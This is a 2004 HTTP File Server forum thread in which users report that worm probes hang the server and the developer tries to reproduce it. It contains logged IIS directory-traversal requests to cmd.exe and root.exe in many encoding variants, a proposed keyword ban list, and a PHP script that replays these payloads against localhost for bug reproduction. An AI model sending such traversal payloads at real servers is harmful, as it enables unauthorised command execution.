rejetto forum
Software => HFS ~ HTTP File Server => Topic started by: Anonymous on September 21, 2004, 10:37:25 AM
-
Would be very nice if you could automatically ban IP addresses that send GET request contain certain keywords.
Kind of like this:
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /msadc/..%5c../..%5c../..%5c/..Á�../..Á�../..Á�../winnt/system32/cmd.exe?/c dir
GET /scripts/..Á�../winnt/system32/cmd.exe?/c dir
GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir
etc...
-
Second time this happens today now, but it seems that when I get these worm get attempts, HFS will hang.
The menu button stops working completly, for instance :(
-
Second time this happens today now, but it seems that when I get these worm get attempts, HFS will hang.
The menu button stops working completly, for instance :(
Rejetto, this seems consistent for me, because HFS has hung all three times i've gotten these malformed GET requests.
-
i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request
-
i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request
Here's a log file:
on 3 occations the same IP caused HFS to hang. When trying to click the Menu button, nothing would happen.
I added the IP as banned when it happened the first time, so I only saw ".... connected" after that, but still the server hung.
2004-09-21 11:17:41 213.114.30.46:2299 Connected
2004-09-21 11:17:41 213.114.30.46:2299 Requested GET /scripts/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2299 Request dump
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2301 Connected
2004-09-21 11:17:41 213.114.30.46:2301 Requested GET /MSADC/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2301 Request dump
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2313 Connected
2004-09-21 11:17:41 213.114.30.46:2313 Requested GET /c/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2313 Request dump
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2315 Connected
2004-09-21 11:17:41 213.114.30.46:2315 Requested GET /d/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2315 Request dump
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2320 Connected
2004-09-21 11:17:41 213.114.30.46:2320 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2320 Request dump
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2326 Connected
2004-09-21 11:17:42 213.114.30.46:2326 Requested GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2326 Request dump
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2328 Connected
2004-09-21 11:17:42 213.114.30.46:2328 Requested GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2328 Request dump
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2331 Connected
2004-09-21 11:17:42 213.114.30.46:2331 Requested GET /msadc/..%5c../..%5c../..%5c/..Á�../..Á�../..Á�../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2331 Request dump
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2335 Connected
2004-09-21 11:17:42 213.114.30.46:2335 Requested GET /scripts/..Á�../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2335 Request dump
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2339 Connected
2004-09-21 11:17:42 213.114.30.46:2339 Requested GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2339 Request dump
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2340 Connected
2004-09-21 11:17:42 213.114.30.46:2340 Requested GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2340 Request dump
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2343 Connected
2004-09-21 11:17:42 213.114.30.46:2343 Requested GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2343 Request dump
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2344 Connected
2004-09-21 11:17:43 213.114.30.46:2344 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2344 Request dump
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2346 Connected
2004-09-21 11:17:43 213.114.30.46:2346 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2346 Request dump
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2353 Connected
2004-09-21 11:17:43 213.114.30.46:2353 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2353 Request dump
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2360 Connected
2004-09-21 11:17:43 213.114.30.46:2360 Requested GET /scripts/..%2f../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2360 Request dump
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
-
i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request
The tool is probably a worm like "Code red" or something. I don't have that :)
-
i made this php script to test, but it was not able to hang my HFS :(
<?
$urls = array(
'/scripts/root.exe?/c+dir',
'/MSADC/root.exe?/c+dir',
'/c/winnt/system32/cmd.exe?/c+dir',
'/d/winnt/system32/cmd.exe?/c+dir',
'/scripts/..%255c../winnt/system32/cmd.exe?/c+dir',
'/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%252f../winnt/system32/cmd.exe?/c+dir',
);
foreach ($urls as $url) {
$sock = fsockopen('localhost', 80) or die('cant open');
fwrite($sock, "GET $url HTTP/1.0\r\nHost: www\r\nConnection: close\r\n\r\n");
while (!feof($sock)) fread($sock,4096);
fclose($sock);
echo '.';
}
?>
-
I'll report back with a full log if it happens again. (haven't run the server in a while now).
I had "let browse" on the root turned off when this happened (if that would be any kind of help)